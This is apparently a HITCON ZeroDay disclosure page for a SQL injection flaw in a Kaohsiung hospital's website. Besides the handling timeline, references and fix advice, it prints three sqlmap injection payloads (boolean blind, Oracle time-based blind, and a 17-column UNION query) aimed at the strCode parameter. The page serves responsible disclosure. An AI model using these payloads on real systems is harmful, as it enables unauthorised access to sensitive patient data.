慈惠醫院資料庫注入漏洞

Vulnerability Overview

ZDID: ZD-2021-00046
發信 Vendor: 財團法人台灣省私立高雄仁愛之家附設慈惠醫院
Title: 慈惠醫院資料庫注入漏洞
Introduction: sql注入漏洞可以获取数据

處理狀態

目前狀態

公開

Last Update : 2021/03/23

新提交
已審核
已通報
已修補
已複測
公開

處理歷程

2021/01/24 01:49:09 : 新提交 (由鄉民更新此狀態)
2021/01/25 01:08:18 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/01/25 17:29:36 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/01/25 17:29:36 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/01/25 17:29:36 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/03/16 18:22:27 : 複測申請中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/03/19 20:32:20 : 確認已修補 (由鄉民更新此狀態)
2021/03/23 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2021-00046
通報者：鄉民
風險：高
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

訪問url Burp抓包

使用弱掃工具SqlMap掃描問題網址，至少可以列舉出web server所使用的DB帳號，漏洞資訊如下：

Parameter: strCode (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: strCode=OABI30'and'n'='n' AND 9289=9289 AND 'uLRa'='uLRa

Type: time-based blind
Title: Oracle AND time-based blind
Payload: strCode=OABI30'and'n'='n' AND 2231=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(113)||CHR(67)||CHR(122),5) AND 'SyTL'='SyTL

Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: strCode=OABI30'and'n'='n' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(112)||CHR(98)||CHR(98)||CHR(113)||CHR(101)||CHR(73)||CHR(82)||CHR(117)||CHR(120)||CHR(80)||CHR(106)||CHR(109)||CHR(100)||CHR(106)||CHR(82)||CHR(105)||CHR(80)||CHR(102)||CHR(90)||CHR(121)||CHR(76)||CHR(98)||CHR(119)||CHR(101)||CHR(105)||CHR(108)||CHR(106)||CHR(86)||CHR(67)||CHR(88)||CHR(78)||CHR(114)||CHR(80)||CHR(67)||CHR(75)||CHR(81)||CHR(78)||CHR(84)||CHR(101)||CHR(114)||CHR(82)||CHR(75)||CHR(108)||CHR(84)||CHR(113)||CHR(98)||CHR(120)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XQEw

發覺可以跑出數據庫

修補建議

1. 針對所有GET/POST的所得到的變數，一定要確認變數中沒有不合規的字元，例如：'、"、--、=、...等
2. 最好還能限制變數內容的字串長度、型別，並使用prepare statement來處理SQL語法的使用
3. 可google一下排除SQL injection的php程式開發範例

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

慈惠醫院資料庫注入漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

處理狀態

目前狀態

處理歷程

詳細資料

參考資料

相關網址

敘述

訪問url Burp抓包

使用弱掃工具SqlMap掃描問題網址，至少可以列舉出web server所使用的DB帳號，漏洞資訊如下：

修補建議

擷圖

留言討論

聯絡組織

Vulnerability Detail Report

Vulnerability Overview

處理狀態

目前狀態

處理歷程

詳細資料

參考資料

相關網址

敘述

訪問url Burp抓包 使用弱掃工具SqlMap掃描問題網址，至少可以列舉出web server所使用的DB帳號，漏洞資訊如下：

修補建議

擷圖

留言討論

聯絡組織

訪問url Burp抓包

使用弱掃工具SqlMap掃描問題網址，至少可以列舉出web server所使用的DB帳號，漏洞資訊如下：